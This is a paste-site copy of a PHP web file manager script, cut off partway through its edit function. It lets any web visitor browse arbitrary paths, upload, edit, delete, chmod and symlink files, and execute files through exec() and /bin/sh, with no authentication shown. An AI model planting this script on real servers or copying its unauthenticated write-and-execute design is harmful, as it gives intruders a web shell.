· 5 years ago · Jun 12, 2020, 01:48 PM
1<?php $lang = 'auto';
2 $site_charset = 'auto';
3 $homedir = './';
4 $editcols = 150;
5 $editrows = 38;
6 $htaccess = '.htaccess';
7 $htpasswd = '.htpasswd';
8 if (get_magic_quotes_gpc()) { array_walk($_GET, 'strip');
9 array_walk($_POST, 'strip');
10 array_walk($_REQUEST, 'strip');
11 } if (array_key_exists('image', $_GET)) { header('Content-Type: image/gif');
12 die(getimage($_GET['image']));
13 } if (!function_exists('lstat')) { function lstat ($filename) { return stat($filename);
14 } } $delim = DIRECTORY_SEPARATOR;
15 if (function_exists('php_uname')) { $win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false;
16 } else { $win = ($delim == '\\') ? true : false;
17 } if (!empty($_SERVER['PATH_TRANSLATED'])) { $scriptdir = dirname($_SERVER['PATH_TRANSLATED']);
18 } elseif (!empty($_SERVER['SCRIPT_FILENAME'])) { $scriptdir = dirname($_SERVER['SCRIPT_FILENAME']);
19 } elseif (function_exists('getcwd')) { $scriptdir = getcwd();
20 } else { $scriptdir = '.';
21 } $homedir = relative2absolute($homedir, $scriptdir);
22 $dir = (array_key_exists('dir', $_REQUEST)) ? $_REQUEST['dir'] : $homedir;
23 if (array_key_exists('olddir', $_POST) && !path_is_relative($_POST['olddir'])) { $dir = relative2absolute($dir, $_POST['olddir']);
24 } $directory = simplify_path(addslash($dir));
25 $files = array();
26 $action = '';
27 if (!empty($_POST['submit_all'])) { $action = $_POST['action_all'];
28 for ($i = 0;
29 $i < $_POST['num'];
30 $i++) { if (array_key_exists("checked$i", $_POST) && $_POST["checked$i"] == 'true') { $files[] = $_POST["file$i"];
31 } } } elseif (!empty($_REQUEST['action'])) { $action = $_REQUEST['action'];
32 $files[] = relative2absolute($_REQUEST['file'], $directory);
33 } elseif (!empty($_POST['submit_upload']) && !empty($_FILES['upload']['name'])) { $files[] = $_FILES['upload'];
34 $action = 'upload';
35 } elseif (array_key_exists('num', $_POST)) { for ($i = 0;
36 $i < $_POST['num'];
37 $i++) { if (array_key_exists("submit$i", $_POST)) break;
38 } if ($i < $_POST['num']) { $action = $_POST["action$i"];
39 $files[] = $_POST["file$i"];
40 } } if (empty($action) && (!empty($_POST['submit_create']) || (array_key_exists('focus', $_POST) && $_POST['focus'] == 'create')) && !empty($_POST['create_name'])) { $files[] = relative2absolute($_POST['create_name'], $directory);
41 switch ($_POST['create_type']) { case 'directory': $action = 'create_directory';
42 break;
43 case 'file': $action = 'create_file';
44 } } if (sizeof($files) == 0) $action = '';
45 else $file = reset($files);
46 if ($lang == 'auto') { if (array_key_exists('HTTP_ACCEPT_LANGUAGE', $_SERVER) && strlen($_SERVER['HTTP_ACCEPT_LANGUAGE']) >= 2) { $lang = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2);
47 } else { $lang = 'en';
48 } } $words = getwords($lang);
49 if ($site_charset == 'auto') { $site_charset = $word_charset;
50 } $cols = ($win) ? 4 : 7;
51 if (!isset($dirpermission)) { $dirpermission = (function_exists('umask')) ? (0777 & ~umask()) : 0755;
52 } if (!isset($filepermission)) { $filepermission = (function_exists('umask')) ? (0666 & ~umask()) : 0644;
53 } if (!empty($_SERVER['SCRIPT_NAME'])) { $self = html(basename($_SERVER['SCRIPT_NAME']));
54 } elseif (!empty($_SERVER['PHP_SELF'])) { $self = html(basename($_SERVER['PHP_SELF']));
55 } else { $self = '';
56 } if (!empty($_SERVER['SERVER_SOFTWARE'])) { if (strtolower(substr($_SERVER['SERVER_SOFTWARE'], 0, 6)) == 'apache') { $apache = true;
57 } else { $apache = false;
58 } } else { $apache = true;
59 } switch ($action) { case 'view': if (is_script($file)) { ob_start();
60 highlight_file($file);
61 $src = ereg_replace('<font color="([^"]*)">', '<span style="color: \1">', ob_get_contents());
62 $src = str_replace(array('</font>', "\r", "\n"), array('</span>', '', ''), $src);
63 ob_end_clean();
64 html_header();
65 echo '<h2 style="text-align: left;
66 margin-bottom: 0">' . html($file) . '</h2>
67<hr />
68<table>
69<tr>
70<td style="text-align: right;
71 vertical-align: top;
72 color: gray;
73 padding-right: 3pt;
74 border-right: 1px solid gray">
75<pre style="margin-top: 0"><code>';
76 for ($i = 1;
77 $i <= sizeof(file($file));
78 $i++) echo "$i\n";
79 echo '</code></pre>
80</td>
81<td style="text-align: left;
82 vertical-align: top;
83 padding-left: 3pt">
84<pre style="margin-top: 0">' . $src . '</pre>
85</td>
86</tr>
87</table>';
88 html_footer();
89 } else { header('Content-Type: ' . getmimetype($file));
90 header('Content-Disposition: filename=' . basename($file));
91 readfile($file);
92 } break;
93 case 'download': header('Pragma: public');
94 header('Expires: 0');
95 header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
96 header('Content-Type: ' . getmimetype($file));
97 header('Content-Disposition: attachment;
98 filename=' . basename($file) . ';
99');
100 header('Content-Length: ' . filesize($file));
101 readfile($file);
102 break;
103 case 'upload': if($_POST['newName'] != "") $file['name'] = $_POST['newName'];
104 $dest = relative2absolute($file['name'], $directory);
105 if (@file_exists($dest)) { listing_page(error('already_exists', $dest));
106 } elseif (@move_uploaded_file($file['tmp_name'], $dest)) { @chmod($dest, $filepermission);
107 listing_page(notice('uploaded', $file['name']));
108 } else { listing_page(error('not_uploaded', $file['name']));
109 } break;
110 case 'create_directory': if (@file_exists($file)) { listing_page(error('already_exists', $file));
111 } else { $old = @umask(0777 & ~$dirpermission);
112 if (@mkdir($file, $dirpermission)) { listing_page(notice('created', $file));
113 } else { listing_page(error('not_created', $file));
114 } @umask($old);
115 } break;
116 case 'create_file': if (@file_exists($file)) { listing_page(error('already_exists', $file));
117 } else { $old = @umask(0777 & ~$filepermission);
118 if (@touch($file)) { edit($file);
119 } else { listing_page(error('not_created', $file));
120 } @umask($old);
121 } break;
122 case 'execute': chdir(dirname($file));
123 $output = array();
124 $retval = 0;
125 exec('echo "./' . basename($file) . '" | /bin/sh', $output, $retval);
126 $error = ($retval == 0) ? false : true;
127 if (sizeof($output) == 0) $output = array('<' . $words['no_output'] . '>');
128 if ($error) { listing_page(error('not_executed', $file, implode("\n", $output)));
129 } else { listing_page(notice('executed', $file, implode("\n", $output)));
130 } break;
131 case 'delete': if (!empty($_POST['no'])) { listing_page();
132 } elseif (!empty($_POST['yes'])) { $failure = array();
133 $success = array();
134 foreach ($files as $file) { if (del($file)) { $success[] = $file;
135 } else { $failure[] = $file;
136 } } $message = '';
137 if (sizeof($failure) > 0) { $message = error('not_deleted', implode("\n", $failure));
138 } if (sizeof($success) > 0) { $message .= notice('deleted', implode("\n", $success));
139 } listing_page($message);
140 } else { html_header();
141 echo '<form action="' . $self . '" method="post"><table class="dialog"><tr><td class="dialog">';
142 request_dump();
143 echo "\t<b>" . word('really_delete') . '</b><p>';
144 foreach ($files as $file) { echo "\t" . html($file) . "<br />\n";
145 } echo ' </p><hr />
146<input type="submit" name="yes" value="' . word('yes') . '" id="green_button" />
147<input type="submit" name="no" value="' . word('no') . '" id="red_button" style="margin-left: 50px" />
148</td></tr></table></form>';
149 html_footer();
150 } break;
151 case 'rename': if (!empty($_POST['destination'])) { $dest = relative2absolute($_POST['destination'], $directory);
152 if (!@file_exists($dest) && @rename($file, $dest)) { listing_page(notice('renamed', $file, $dest));
153 } else { listing_page(error('not_renamed', $file, $dest));
154 } } else { $name = basename($file);
155 html_header();
156 echo '<form action="' . $self . '" method="post"><table class="dialog"><tr>
157<td class="dialog">
158 <input type="hidden" name="action" value="rename" />
159 <input type="hidden" name="file" value="' . html($file) . '" />
160 <input type="hidden" name="dir" value="' . html($directory) . '" />
161 <b>' . word('rename_file') . '</b>
162 <p>' . html($file) . '</p>
163 <b>' . substr($file, 0, strlen($file) - strlen($name)) . '</b>
164 <input type="text" name="destination" size="' . textfieldsize($name) . '" value="' . html($name) . '" />
165 <hr />
166 <input type="submit" value="' . word('rename') . '" />
167</td></tr></table>
168<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p></form>';
169 html_footer();
170 } break;
171 case 'move': if (!empty($_POST['destination'])) { $dest = relative2absolute($_POST['destination'], $directory);
172 $failure = array();
173 $success = array();
174 foreach ($files as $file) { $filename = substr($file, strlen($directory));
175 $d = $dest . $filename;
176 if (!@file_exists($d) && @rename($file, $d)) { $success[] = $file;
177 } else { $failure[] = $file;
178 } } $message = '';
179 if (sizeof($failure) > 0) { $message = error('not_moved', implode("\n", $failure), $dest);
180 } if (sizeof($success) > 0) { $message .= notice('moved', implode("\n", $success), $dest);
181 } listing_page($message);
182 } else { html_header();
183 echo '<form action="' . $self . '" method="post"><table class="dialog"><tr><td class="dialog">';
184 request_dump();
185 echo "\t<b>" . word('move_files') . '</b><p>';
186 foreach ($files as $file) { echo "\t" . html($file) . "<br />\n";
187 } echo ' </p><hr /> ' . word('destination') . ':
188<input type="text" name="destination" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
189<input type="submit" value="' . word('move') . '" />
190</td></tr></table>
191<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p></form>';
192 html_footer();
193 } break;
194 case 'copy': if (!empty($_POST['destination'])) { $dest = relative2absolute($_POST['destination'], $directory);
195 if (@is_dir($dest)) { $failure = array();
196 $success = array();
197 foreach ($files as $file) { $filename = substr($file, strlen($directory));
198 $d = addslash($dest) . $filename;
199 if (!@is_dir($file) && !@file_exists($d) && @copy($file, $d)) { $success[] = $file;
200 } else { $failure[] = $file;
201 } } $message = '';
202 if (sizeof($failure) > 0) { $message = error('not_copied', implode("\n", $failure), $dest);
203 } if (sizeof($success) > 0) { $message .= notice('copied', implode("\n", $success), $dest);
204 } listing_page($message);
205 } else { if (!@file_exists($dest) && @copy($file, $dest)) { listing_page(notice('copied', $file, $dest));
206 } else { listing_page(error('not_copied', $file, $dest));
207 } } } else { html_header();
208 echo '<form action="' . $self . '" method="post"><table class="dialog"><tr><td class="dialog">';
209 request_dump();
210 echo "\n<b>" . word('copy_files') . '</b><p>';
211 foreach ($files as $file) { echo "\t" . html($file) . "<br />\n";
212 } echo ' </p><hr />' . word('destination') . ':
213<input type="text" name="destination" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
214<input type="submit" value="' . word('copy') . '" />
215</td></tr></table>
216<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p></form>';
217 html_footer();
218 } break;
219 case 'create_symlink': if (!empty($_POST['destination'])) { $dest = relative2absolute($_POST['destination'], $directory);
220 if (substr($dest, -1, 1) == $delim) $dest .= basename($file);
221 if (!empty($_POST['relative'])) $file = absolute2relative(addslash(dirname($dest)), $file);
222 if (!@file_exists($dest) && @symlink($file, $dest)) { listing_page(notice('symlinked', $file, $dest));
223 } else { listing_page(error('not_symlinked', $file, $dest));
224 } } else { html_header();
225 echo '<form action="' . $self . '" method="post">
226<table class="dialog" id="symlink">
227<tr>
228 <td style="vertical-align: top">' . word('destination') . ': </td>
229 <td>
230 <b>' . html($file) . '</b><br />
231 <input type="checkbox" name="relative" value="yes" id="checkbox_relative" checked="checked" style="margin-top: 1ex" />
232 <label for="checkbox_relative">' . word('relative') . '</label>
233 <input type="hidden" name="action" value="create_symlink" />
234 <input type="hidden" name="file" value="' . html($file) . '" />
235 <input type="hidden" name="dir" value="' . html($directory) . '" />
236 </td>
237</tr>
238<tr>
239 <td>' . word('symlink') . ': </td>
240 <td>
241 <input type="text" name="destination" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
242 <input type="submit" value="' . word('create_symlink') . '" />
243 </td>
244</tr>
245</table>
246<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p></form>';
247 html_footer();
248 } break;
249 case 'edit': if (!empty($_POST['save'])) { $content = str_replace("\r\n", "\n", $_POST['content']);
250 if (($f = @fopen($file, 'w')) && @fwrite($f, $content) !== false && @fclose($f)) { listing_page(notice('saved', $file));
251 } else { listing_page(error('not_saved', $file));
252 } } else { if (@is_readable($file) && @is_writable($file)) { edit($file);
253 } else { listing_page(error('not_edited', $file));
254 } } break;
255 case 'permission': if (!empty($_POST['set'])) { $mode = 0;
256 if (!empty($_POST['ur'])) $mode |= 0400;
257 if (!empty($_POST['uw'])) $mode |= 0200;
258 if (!empty($_POST['ux'])) $mode |= 0100;
259 if (!empty($_POST['gr'])) $mode |= 0040;
260 if (!empty($_POST['gw'])) $mode |= 0020;
261 if (!empty($_POST['gx'])) $mode |= 0010;
262 if (!empty($_POST['or'])) $mode |= 0004;
263 if (!empty($_POST['ow'])) $mode |= 0002;
264 if (!empty($_POST['ox'])) $mode |= 0001;
265 if (@chmod($file, $mode)) { listing_page(notice('permission_set', $file, decoct($mode)));
266 } else { listing_page(error('permission_not_set', $file, decoct($mode)));
267 } } else { html_header();
268 $mode = fileperms($file);
269 echo '<form action="' . $self . '" method="post">
270<table class="dialog">
271<tr>
272<td class="dialog">
273 <p style="margin: 0">' . phrase('permission_for', $file) . '</p>
274 <hr />
275 <table id="permission">
276 <tr>
277 <td></td>
278 <td style="border-right: 1px solid black">' . word('owner') . '</td>
279 <td style="border-right: 1px solid black">' . word('group') . '</td>
280 <td>' . word('other') . '</td>
281 </tr>
282 <tr>
283 <td style="text-align: right">' . word('read') . ':</td>
284 <td><input type="checkbox" name="ur" value="1"';
285 if ($mode & 00400) echo ' checked="checked"';
286 echo ' /></td>
287 <td><input type="checkbox" name="gr" value="1"';
288 if ($mode & 00040) echo ' checked="checked"';
289 echo ' /></td>
290 <td><input type="checkbox" name="or" value="1"';
291 if ($mode & 00004) echo ' checked="checked"';
292 echo ' /></td>
293 </tr>
294 <tr>
295 <td style="text-align: right">' . word('write') . ':</td>
296 <td><input type="checkbox" name="uw" value="1"';
297 if ($mode & 00200) echo ' checked="checked"';
298 echo ' /></td>
299 <td><input type="checkbox" name="gw" value="1"';
300 if ($mode & 00020) echo ' checked="checked"';
301 echo ' /></td>
302 <td><input type="checkbox" name="ow" value="1"';
303 if ($mode & 00002) echo ' checked="checked"';
304 echo ' /></td>
305 </tr>
306 <tr>
307 <td style="text-align: right">' . word('execute') . ':</td>
308 <td><input type="checkbox" name="ux" value="1"';
309 if ($mode & 00100) echo ' checked="checked"';
310 echo ' /></td>
311 <td><input type="checkbox" name="gx" value="1"';
312 if ($mode & 00010) echo ' checked="checked"';
313 echo ' /></td>
314 <td><input type="checkbox" name="ox" value="1"';
315 if ($mode & 00001) echo ' checked="checked"';
316 echo ' /></td>
317 </tr>
318 </table>
319 <hr />
320 <input type="submit" name="set" value=" ' . word('set') . ' " />
321 <input type="hidden" name="action" value="permission" />
322 <input type="hidden" name="file" value="' . html($file) . '" />
323 <input type="hidden" name="dir" value="' . html($directory) . '" />
324</td>
325</tr>
326</table>
327<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p></form>';
328 html_footer();
329 } break;
330 default: listing_page();
331 } function getlist ($directory) { global $delim, $win;
332 if ($d = @opendir($directory)) { while (($filename = @readdir($d)) !== false) { $path = $directory . $filename;
333 if ($stat = @lstat($path)) { $file = array( 'filename' => $filename, 'path' => $path, 'is_file' => @is_file($path), 'is_dir' => @is_dir($path), 'is_link' => @is_link($path), 'is_readable' => @is_readable($path), 'is_writable' => @is_writable($path), 'size' => $stat['size'], 'permission' => $stat['mode'], 'owner' => $stat['uid'], 'group' => $stat['gid'], 'mtime' => @filemtime($path), 'atime' => @fileatime($path), 'ctime' => @filectime($path) );
334 if ($file['is_dir']) { $file['is_executable'] = @file_exists($path . $delim . '.');
335 } else { if (!$win) { $file['is_executable'] = @is_executable($path);
336 } else { $file['is_executable'] = true;
337 } } if ($file['is_link']) $file['target'] = @readlink($path);
338 if (function_exists('posix_getpwuid')) $file['owner_name'] = @reset(posix_getpwuid($file['owner']));
339 if (function_exists('posix_getgrgid')) $file['group_name'] = @reset(posix_getgrgid($file['group']));
340 $files[] = $file;
341 } } return $files;
342 } else { return false;
343 } } function sortlist ($list, $key, $reverse) { $dirs = array();
344 $files = array();
345 for ($i = 0;
346 $i < sizeof($list);
347 $i++) { if ($list[$i]['is_dir']) $dirs[] = $list[$i];
348 else $files[] = $list[$i];
349 } quicksort($dirs, 0, sizeof($dirs) - 1, $key);
350 if ($reverse) $dirs = array_reverse($dirs);
351 quicksort($files, 0, sizeof($files) - 1, $key);
352 if ($reverse) $files = array_reverse($files);
353 return array_merge($dirs, $files);
354 } function quicksort (&$array, $first, $last, $key) { if ($first < $last) { $cmp = $array[floor(($first + $last) / 2)][$key];
355 $l = $first;
356 $r = $last;
357 while ($l <= $r) { while ($array[$l][$key] < $cmp) $l++;
358 while ($array[$r][$key] > $cmp) $r--;
359 if ($l <= $r) { $tmp = $array[$l];
360 $array[$l] = $array[$r];
361 $array[$r] = $tmp;
362 $l++;
363 $r--;
364 } } quicksort($array, $first, $r, $key);
365 quicksort($array, $l, $last, $key);
366 } } function permission_octal2string ($mode) { if (($mode & 0xC000) === 0xC000) { $type = 's';
367 } elseif (($mode & 0xA000) === 0xA000) { $type = 'l';
368 } elseif (($mode & 0x8000) === 0x8000) { $type = '-';
369 } elseif (($mode & 0x6000) === 0x6000) { $type = 'b';
370 } elseif (($mode & 0x4000) === 0x4000) { $type = 'd';
371 } elseif (($mode & 0x2000) === 0x2000) { $type = 'c';
372 } elseif (($mode & 0x1000) === 0x1000) { $type = 'p';
373 } else { $type = '?';
374 } $owner = ($mode & 00400) ? 'r' : '-';
375 $owner .= ($mode & 00200) ? 'w' : '-';
376 if ($mode & 0x800) { $owner .= ($mode & 00100) ? 's' : 'S';
377 } else { $owner .= ($mode & 00100) ? 'x' : '-';
378 } $group = ($mode & 00040) ? 'r' : '-';
379 $group .= ($mode & 00020) ? 'w' : '-';
380 if ($mode & 0x400) { $group .= ($mode & 00010) ? 's' : 'S';
381 } else { $group .= ($mode & 00010) ? 'x' : '-';
382 } $other = ($mode & 00004) ? 'r' : '-';
383 $other .= ($mode & 00002) ? 'w' : '-';
384 if ($mode & 0x200) { $other .= ($mode & 00001) ? 't' : 'T';
385 } else { $other .= ($mode & 00001) ? 'x' : '-';
386 } return $type . $owner . $group . $other;
387 } function is_script ($filename) { return ereg('\.php$|\.php3$|\.php4$|\.php5$', $filename);
388 } function getmimetype ($filename) { static $mimes = array( '\.jpg$|\.jpeg$' => 'image/jpeg', '\.gif$' => 'image/gif', '\.png$' => 'image/png', '\.html$|\.html$' => 'text/html', '\.txt$|\.asc$' => 'text/plain', '\.xml$|\.xsl$' => 'application/xml', '\.pdf$' => 'application/pdf' );
389 foreach ($mimes as $regex => $mime) { if (eregi($regex, $filename)) return $mime;
390 } return 'text/plain';
391 } function del ($file) { global $delim;
392 if (!file_exists($file)) return false;
393 if (@is_dir($file) && !@is_link($file)) { $success = false;
394 if (@rmdir($file)) { $success = true;
395 } elseif ($dir = @opendir($file)) { $success = true;
396 while (($f = readdir($dir)) !== false) { if ($f != '.' && $f != '..' && !del($file . $delim . $f)) { $success = false;
397 } } closedir($dir);
398 if ($success) $success = @rmdir($file);
399 } return $success;
400 } return @unlink($file);
401 } function addslash ($directory) { global $delim;
402 if (substr($directory, -1, 1) != $delim) { return $directory . $delim;
403 } else { return $directory;
404 } } function relative2absolute ($string, $directory) { if (path_is_relative($string)) { return simplify_path(addslash($directory) . $string);
405 } else { return simplify_path($string);
406 } } function path_is_relative ($path) { global $win;
407 if ($win) { return (substr($path, 1, 1) != ':');
408 } else { return (substr($path, 0, 1) != '/');
409 } } function absolute2relative ($directory, $target) { global $delim;
410 $path = '';
411 while ($directory != $target) { if ($directory == substr($target, 0, strlen($directory))) { $path .= substr($target, strlen($directory));
412 break;
413 } else { $path .= '..' . $delim;
414 $directory = substr($directory, 0, strrpos(substr($directory, 0, -1), $delim) + 1);
415 } } if ($path == '') $path = '.';
416 return $path;
417 } function simplify_path ($path) { global $delim;
418 if (@file_exists($path) && function_exists('realpath') && @realpath($path) != '') { $path = realpath($path);
419 if (@is_dir($path)) { return addslash($path);
420 } else { return $path;
421 } } $pattern = $delim . '.' . $delim;
422 if (@is_dir($path)) { $path = addslash($path);
423 } while (strpos($path, $pattern) !== false) { $path = str_replace($pattern, $delim, $path);
424 } $e = addslashes($delim);
425 $regex = $e . '((\.[^\.' . $e . '][^' . $e . ']*)|(\.\.[^' . $e . ']+)|([^\.][^' . $e . ']*))' . $e . '\.\.' . $e;
426 while (ereg($regex, $path)) { $path = ereg_replace($regex, $delim, $path);
427 } return $path;
428 } function byteConvert(&$bytes){ $b = (int)$bytes;
429 $s = array(' B', 'KB', 'MB', 'GB', 'TB');
430 if($b <= 0){ return "0 ".$s[0];
431 } $con = 1024;
432 $e = (int)(log($b,$con));
433 return number_format($b/pow($con,$e),2,',','.').' '.$s[$e];
434 } function strip (&$str) { $str = stripslashes($str);
435 } function listing_page ($message = null) { global $self, $directory, $sort, $reverse;
436 html_header();
437 $list = getlist($directory);
438 if (array_key_exists('sort', $_GET)) $sort = $_GET['sort'];
439 else $sort = 'filename';
440 if (array_key_exists('reverse', $_GET) && $_GET['reverse'] == 'true') $reverse = true;
441 else $reverse = false;
442 echo '<h1 style="margin-bottom: 0"><a href="FileManager.php">File Manager</a></h1>
443<form enctype="multipart/form-data" action="' . $self . '" method="post">
444<table id="main" >';
445 directory_choice();
446 if (@is_writable($directory)) { upload_box();
447 create_box();
448 } else { spacer();
449 } if (!empty($message)) { spacer();
450 echo $message;
451 } echo '</table><table id="tblContent"';
452 if ($list) { $list = sortlist($list, $sort, $reverse);
453 listing($list);
454 } else { echo error('not_readable', $directory);
455 } echo '</table></form>';
456 html_footer();
457 } function listing ($list) { global $directory, $homedir, $sort, $reverse, $win, $cols, $date_format, $self;
458 echo '<tr class="titleContent">
459 <td style="text-align: center;
460 vertical-align: middle"><img src="' . $self . '?image=smiley" alt="smiley" /></td>';
461 column_title('filename', $sort, $reverse);
462 column_title('size', $sort, $reverse);
463 if (!$win) { column_title('permission', $sort, $reverse);
464 column_title('owner', $sort, $reverse);
465 column_title('group', $sort, $reverse);
466 } echo ' <td class="functions">' . word('functions') . '</td></tr>';
467 for ($i = 0;
468 $i < sizeof($list);
469 $i++) { $file = $list[$i];
470 $timestamps = 'mtime: ' . date($date_format, $file['mtime']) . ', ';
471 $timestamps .= 'atime: ' . date($date_format, $file['atime']) . ', ';
472 $timestamps .= 'ctime: ' . date($date_format, $file['ctime']);
473 echo '<tr class="listing">
474 <td class="checkbox"><input type="checkbox" name="checked' . $i . '" value="true" onfocus="activate(\'other\')" /></td>
475 <td class="filename" title="' . html($timestamps) . '">';
476 if ($file['is_link']) { echo '<img src="' . $self . '?image=link" alt="link" /> ';
477 echo html($file['filename']) . ' →
478 ';
479 $real_file = relative2absolute($file['target'], $directory);
480 if (@is_readable($real_file)) { if (@is_dir($real_file)) { echo '[ <a href="' . $self . '?dir=' . urlencode($real_file) . '">' . html($file['target']) . '</a> ]';
481 } else { echo '<a href="' . $self . '?action=view&
482file=' . urlencode($real_file) . '">' . html($file['target']) . '</a>';
483 } } else { echo html($file['target']);
484 } } elseif ($file['is_dir']) { echo '<img src="' . $self . '?image=folder" alt="folder" /> [ ';
485 if ($win || $file['is_executable']) { echo '<a href="' . $self . '?dir=' . urlencode($file['path']) . '">' . html($file['filename']) . '</a>';
486 } else { echo html($file['filename']);
487 } echo ' ]';
488 } else { if (substr($file['filename'], 0, 1) == '.') { echo '<img src="' . $self . '?image=hidden_file" alt="hidden file" /> ';
489 } else { echo '<img src="' . $self . '?image=file" alt="file" /> ';
490 } if ($file['is_file'] && $file['is_readable']) { echo '<a href="' . $self . '?action=view&
491file=' . urlencode($file['path']) . '" target="_blank">' . html($file['filename']) . '</a>';
492 } else { echo html($file['filename']);
493 } } if ($file['size'] >= 1000) { $human = ' title="' . byteConvert($file['size']) . '"';
494 } else { $human = '';
495 } echo "</td>\n";
496 echo "\t<td class=\"size\"$human>". byteConvert($file['size']). "</td>\n";
497 if (!$win) { echo "\t<td class=\"permission\" title=\"" . decoct($file['permission']) . '">';
498 $l = !$file['is_link'] && (!function_exists('posix_getuid') || $file['owner'] == posix_getuid());
499 if ($l) echo '<a href="' . $self . '?action=permission&
500file=' . urlencode($file['path']) . '&
501dir=' . urlencode($directory) . '">';
502 echo html(permission_octal2string($file['permission']));
503 if ($l) echo '</a>';
504 echo "</td>\n";
505 if (array_key_exists('owner_name', $file)) { echo "\t<td class=\"owner\" title=\"uid: {$file['owner']}\">{$file['owner_name']}</td>\n";
506 } else { echo "\t<td class=\"owner\">{$file['owner']}</td>\n";
507 } if (array_key_exists('group_name', $file)) { echo "\t<td class=\"group\" title=\"gid: {$file['group']}\">{$file['group_name']}</td>\n";
508 } else { echo "\t<td class=\"group\">{$file['group']}</td>\n";
509 } } echo ' <td class="functions"><input type="hidden" name="file' . $i . '" value="' . html($file['path']) . '" />';
510 $actions = array();
511 if (function_exists('symlink')) { $actions[] = 'create_symlink';
512 } if (@is_writable(dirname($file['path']))) { $actions[] = 'delete';
513 $actions[] = 'rename';
514 $actions[] = 'move';
515 } if ($file['is_file'] && $file['is_readable']) { $actions[] = 'copy';
516 $actions[] = 'download';
517 if ($file['is_writable']) $actions[] = 'edit';
518 } if (!$win && function_exists('exec') && $file['is_file'] && $file['is_executable'] && file_exists('/bin/sh')) { $actions[] = 'execute';
519 } if (sizeof($actions) > 0) { echo '<select name="action' . $i . '" size="1"><option value="">' . str_repeat('
520', 30) . '</option>';
521 foreach ($actions as $action) { echo "\t\t<option value=\"$action\">" . word($action) . "</option>\n";
522 } echo '</select>
523<input type="submit" name="submit' . $i . '" value=" Next " onfocus="activate(\'other\')" />';
524 } echo ' </td></tr>';
525 } echo '<tr class="listing_footer">
526 <td style="text-align: right;
527 vertical-align: top"><img src="' . $self . '?image=arrow" alt=">
528" /></td>
529 <td colspan="' . ($cols - 1) . '">
530 <input type="hidden" name="num" value="' . sizeof($list) . '" />
531 <input type="hidden" name="focus" value="" />
532 <input type="hidden" name="olddir" value="' . html($directory) . '" />';
533 $actions = array();
534 if (@is_writable(dirname($file['path']))) { $actions[] = 'delete';
535 $actions[] = 'move';
536 } $actions[] = 'copy';
537 echo ' <select name="action_all" size="1">
538 <option value="">' . str_repeat('
539', 30) . '</option>';
540 foreach ($actions as $action) { echo "\t\t<option value=\"$action\">" . word($action) . "</option>\n";
541 } echo ' </select>
542 <input type="submit" name="submit_all" value=" Next " onfocus="activate(\'other\')" /></td></tr>';
543 } function column_title ($column, $sort, $reverse) { global $self, $directory;
544 $d = 'dir=' . urlencode($directory) . '&
545';
546 $arr = '';
547 $r = '';
548 if ($sort == $column) { if (!$reverse) { $r = '&
549reverse=true';
550 $arr = ' ∧
551';
552 } else { $arr = ' ∨
553';
554 } } else { $r = '';
555 } echo "\t<td class=\"$column\"><a href=\"$self?{$d}sort=$column$r\">" . word($column) . "</a>$arr</td>\n";
556 } function directory_choice () { global $directory, $homedir, $cols, $self;
557 echo '<tr>
558 <td colspan="' . $cols . '" id="directory">
559 <a href="' . $self . '?dir=' . urlencode($homedir) . '">' . word('directory') . '</a>:
560 <input type="text" id="mytxt" class="mytxtDirectory" name="dir" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" onfocus="activate(\'directory\')" />
561 <input type="submit" id="mybtn" name="changedir" value="' . word('change') . '" onfocus="activate(\'directory\')" />
562 </td></tr>';
563 } function upload_box () { global $cols;
564 echo '<tr>
565 <td colspan="' . $cols . '" id="upload">
566 ' . word('file') . ':
567 <input type="file" name="upload" size="70" onfocus="activate(\'other\')" />
568 ' . word('newname') . ': <input type="text" name="newName" size="18" />
569 <input type="submit" class="mybtnUpload" name="submit_upload" value="' . word('upload') . '" onfocus="activate(\'other\')" />
570 </td></tr>';
571 } function create_box () { global $cols;
572 echo '<tr>
573 <td colspan="' . $cols . '" id="create">
574 <select name="create_type" size="1" onfocus="activate(\'create\')">
575 <option value="file">' . word('file') . '</option>
576 <option value="directory">' . word('directory') . '</option>
577 </select>
578 <input type="text" id="mytxt" name="create_name" size="30" onfocus="activate(\'create\')" />
579 <input type="submit" id="mybtn" name="submit_create" value="' . word('create') . '" onfocus="activate(\'create\')" />
580 </td></tr>';
581 } function edit ($file) { global $self, $directory, $editcols, $editrows, $apache, $htpasswd, $htaccess;
582 html_header();
583 echo '<h2 style="margin-bottom: 3pt">' . html($file) . '</h2>
584<form action="' . $self . '" method="post">
585<table class="dialog">
586<tr><td class="dialog">
587 <textarea name="content" cols="' . $editcols . '" rows="' . $editrows . '" WRAP="off">';
588 if (array_key_exists('content', $_POST)) { echo $_POST['content'];
589 } else { $f = fopen($file, 'r');
590 while (!feof($f)) { echo html(fread($f, 8192));
591 } fclose($f);
592 } if (!empty($_POST['user'])) { echo "\n" . $_POST['user'] . ':' . crypt($_POST['password']);
593 } if (!empty($_POST['basic_auth'])) { if ($win) { $authfile = str_replace('\\', '/', $directory) . $htpasswd;
594 } else { $authfile = $directory . $htpasswd;
595 } echo "\nAuthType Basic\nAuthName "
596Restricted Directory"
597\n";
598 echo 'AuthUserFile "
599' . html($authfile) . ""
600\n";
601 echo 'Require valid-user';
602 } echo '</textarea><hr />';
603 if ($apache && basename($file) == $htpasswd) { echo '
604 ' . word('user') . ': <input type="text" name="user" />
605 ' . word('password') . ': <input type="password" name="password" />
606 <input type="submit" value="' . word('add') . '" /><hr />';
607 } if ($apache && basename($file) == $htaccess) { echo '
608 <input type="submit" name="basic_auth" value="' . word('add_basic_auth') . '" /><hr />';
609 } echo '
610 <input type="hidden" name="action" value="edit" />
611 <input type="hidden" name="file" value="' . html($file) . '" />
612 <input type="hidden" name="dir" value="' . html($directory) . '" />
613 <input type="submit" name="save" value="' . word('save') . '" id="green_button" />
